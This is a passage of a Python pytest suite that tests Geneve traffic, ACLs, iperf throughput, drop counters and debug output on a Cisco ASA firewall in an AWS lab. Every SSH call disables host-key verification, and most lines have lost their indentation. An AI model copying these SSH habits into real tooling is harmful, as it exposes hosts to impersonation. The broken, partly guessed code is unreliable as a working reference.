f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
no_acl_config = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
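# Pytest_server.py is copied to the app instances by the tests above but is
# not included in this file. The sketch below is a guess at a minimal
# responder that would satisfy the "[Pytest]TCP:23 is back!" and
# "[Pytest]UDP:666 is back!" assertions; the ports, reply strings, and
# threading layout are assumptions, not the actual server.
def pytest_server_sketch():
    import socket, threading
    def tcp23():
        srv = socket.socket()
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", 23))
        srv.listen(1)
        while True:
            conn, _ = srv.accept()
            conn.recv(1024)
            conn.send("[Pytest]TCP:23 is back!".encode())
            conn.close()
    def udp666():
        srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        srv.bind(("0.0.0.0", 666))
        while True:
            _, addr = srv.recvfrom(1024)
            srv.sendto("[Pytest]UDP:666 is back!".encode(), addr)
    threading.Thread(target=tcp23, daemon=True).start()
    udp666()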
@pytest.mark.geneveASA
@pytest.mark.tcp
@pytest.mark.tcp2to1
def test_TCP23_from_inside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_jb_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3;python3 test.py\''"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.fixture()
def local_run(show=False):
if "aws_obj" not in globals():
aws_obj = aws(record=False)
app_jb = aws_obj.blind("Test-1-169-EC2-App-JB", "EC2INSTANCE", show=show)
asa_jb = aws_obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE", show=show)
asa = aws_obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE", show=show)
app = aws_obj.blind("Test-1-169-EC2-App", "EC2INSTANCE", show=show)
ftd = aws_obj.blind("Pytest-EC2-FTD", "EC2INSTANCE", show=show)
fmc = aws_obj.blind("Pytest-EC2-FMC", "EC2INSTANCE", show=show)
# ftd = aws_obj.blind("Pytest-EC2-FTD", "EC2INSTANCE", show=show)
# fmc = aws_obj.blind("Pytest-EC2-FMC", "EC2INSTANCE", show=show)
app_jb_ip = app_jb["public_ip"]
asa_jb_ip = asa_jb["public_ip"]
asa_ip = asa["public_ip"]
app_ip = app["public_ip"]
ftd_ip = ftd["public_ip"]
fmc_ip = fmc["public_ip"]
yield app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip
aws_obj.close()
@pytest.fixture()
def acl_config(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
yield
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.udpYijun
# def test_UDP666(acl_config):
def test_UDP666(local_run, acl_config):
# if "aws_obj" in globals():
# app_jb = aws_obj.blind("Test-1-169-EC2-App-JB", "EC2INSTANCE")
# asa_jb = aws_obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE")
# asa = aws_obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE")
# app = aws_obj.blind("Test-1-169-EC2-App", "EC2INSTANCE")
#
# else:
# aws_obj = aws(record=False)
# app_jb = aws_obj.blind("Test-1-169-EC2-App-JB", "EC2INSTANCE")
# asa_jb = aws_obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE")
# asa = aws_obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE")
# app = aws_obj.blind("Test-1-169-EC2-App", "EC2INSTANCE")
#
# app_jb_ip = app_jb["public_ip"]
# asa_jb_ip = asa_jb["public_ip"]
# asa_ip = asa["public_ip"]
# app_ip = app["public_ip"]
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
# asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
# acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
# asa_config(asa_address, acl_config)
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
# no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
# asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.udp1to2
def test_UDP_from_inside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.udp2to1
def test_UDP_from_outside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket,os
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_jb_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo python3 test.py; pkill python3\''"
print(cmd5)
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.mark.geneveASA
@pytest.mark.iperfudp
def test_iperf_udp(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s -u'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip} -u\''"
res = os.popen(cmd2).read()
bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.iperfudpreverse
def test_iperf_udp_reverse(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s -u\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip} -u;'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit udp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.iperftcp
def test_iperf_tcp(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip}\''"
res = os.popen(cmd2).read()
try:
bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
except:
bd = re.compile(r" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.iperftcpreverse
def test_iperf_tcp_reverse(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip}'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
    try:
        bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
    except IndexError:
        # iperf reports large transfers in GBytes rather than MBytes
        bd = re.compile(r" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
no_acl_config = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_acl_config)
@pytest.mark.geneveASA
@pytest.mark.counter
def test_udp_counter(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "clear asp drop"
cmd2 = "show asp drop frame geneve-invalid-udp-checksum"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd1)
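    # Send a raw UDP packet to the Geneve port (6081) with its checksum forced to zero and a
    # bogus payload; the ASA is expected to drop it and report it under the
    # geneve-invalid-udp-checksum ASP drop counter checked below.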
send(IP(dst="20.0.1.101") / UDP(sport=20001, dport=6081, chksum=0) / b'\x08\x00\x08')
_, res = asa_config(asa_address, cmd2)
assert "geneve-invalid-udp-checksum" in res
@pytest.mark.geneveASA
@pytest.mark.reset
def test_tcp_counter(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m ssh root@{asa_jb_ip}\''"
os.popen(cmd).read()
cmd2 = "clear conn address 10.0.1.101"
cmd3 = "show asp drop"
cmd1 = "clear asp drop"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd1)
asa_config(asa_address, cmd2)
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill screen\''"
os.popen(cmd).read()
_, res = asa_config(asa_address, cmd3)
assert "tcp-not-syn" in res
@pytest.mark.geneveASA
@pytest.mark.logserver
def test_log_server(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh2 = paramiko.SSHClient()
ssh2.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
ssh2.connect(asa_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
_, stdout, _ = ssh2.exec_command("sudo ifconfig eth1 down;sudo ifconfig eth1 20.0.1.10/24;sudo ifconfig eth1 up")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 10'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
_, stdout, _ = ssh2.exec_command("sudo systemctl restart syslog")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh2.exec_command("tail -n 100 /var/log/syslog")
stdout.channel.recv_exit_status()
resp2 = "".join(stdout.readlines())
if not resp2:
continue
else:
break
assert "8.8.8.8" in resp2
ssh.close()
ssh2.close()
@pytest.mark.geneveASA
@pytest.mark.genevedebug
def test_debug_geneve(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "debug geneve encapsulation"
cmd2 = "debug geneve encapsulation 4"
cmd3 = "debug geneve decapsulation"
cmd4 = "debug geneve decapsulation 4"
cmd5 = "debug geneve all"
    cmd_clean = "unde all"  # short form of "undebug all"
cmd_show = "show debug"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
import pexpect
conn = pexpect.spawn(asa_address)
Geneve_reply(conn)
conn.sendline("en")
Geneve_reply(conn)
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve" not in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd1)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd2)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve encapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd3)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd4)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve decapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd5)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Geneve_reply(conn)
conn.sendline(cmd_show)
_, _, res = Geneve_reply(conn)
assert "debug geneve" not in res
conn.close()
del conn
@pytest.mark.geneveASA
@pytest.mark.metaserver
def test_meta(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "no aaa authentication listener http data-interface port www"
cmd2 = "nat (data-interface,data-interface) source static gwlb interface destination static interface metadata service http80 http80"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd1)
asa_config(asa_address, cmd2)
time.sleep(20)
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.statistics
def test_stats(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd1 = "show interface vni 1"
cmd2 = "show nve 1"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
_, cont1_1 = asa_config(asa_address, cmd1)
_, cont2_1 = asa_config(asa_address, cmd2)
p1 = "(.*) packets input"
p2 = "(.*) packets output"
output_cmd1_1 = int(re.compile(p1).findall(cont1_1)[0])
output_cmd2_1 = int(re.compile(p2).findall(cont2_1)[0])
test_Basic_PingGoogle(local_run)
_, cont1_2 = asa_config(asa_address, cmd1)
_, cont2_2 = asa_config(asa_address, cmd2)
output_cmd1_2 = int(re.compile(p1).findall(cont1_2)[0])
output_cmd2_2 = int(re.compile(p2).findall(cont2_2)[0])
assert output_cmd1_2 > output_cmd1_1
assert output_cmd2_2 > output_cmd2_1
@pytest.mark.geneveASA
@pytest.mark.capture
def test_capture(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
cmd0 = "no capture g"
cmd1 = "clear cap /all"
cmd2 = "cap g int ge trace"
cmd3 = "show capture g | in icmp: echo request"
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
asa_config(asa_address, cmd0)
asa_config(asa_address, cmd1)
asa_config(asa_address, cmd2)
test_Basic_PingGoogle(local_run)
time.sleep(1)
_, cont3 = asa_config(asa_address, cmd3)
    pNum = int(re.compile(r"\d+: ").findall(cont3)[0].strip().split(":")[0])
cmd4 = f"show capture g trace packet-number {pNum}"
cmd5 = "no capture g"
_, cont4 = asa_config(asa_address, cmd4)
assert "Action: allow" in cont4
asa_config(asa_address, cmd5)
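# The tests below drive an in-house AWS deployment helper (the aws class) with a YAML-like
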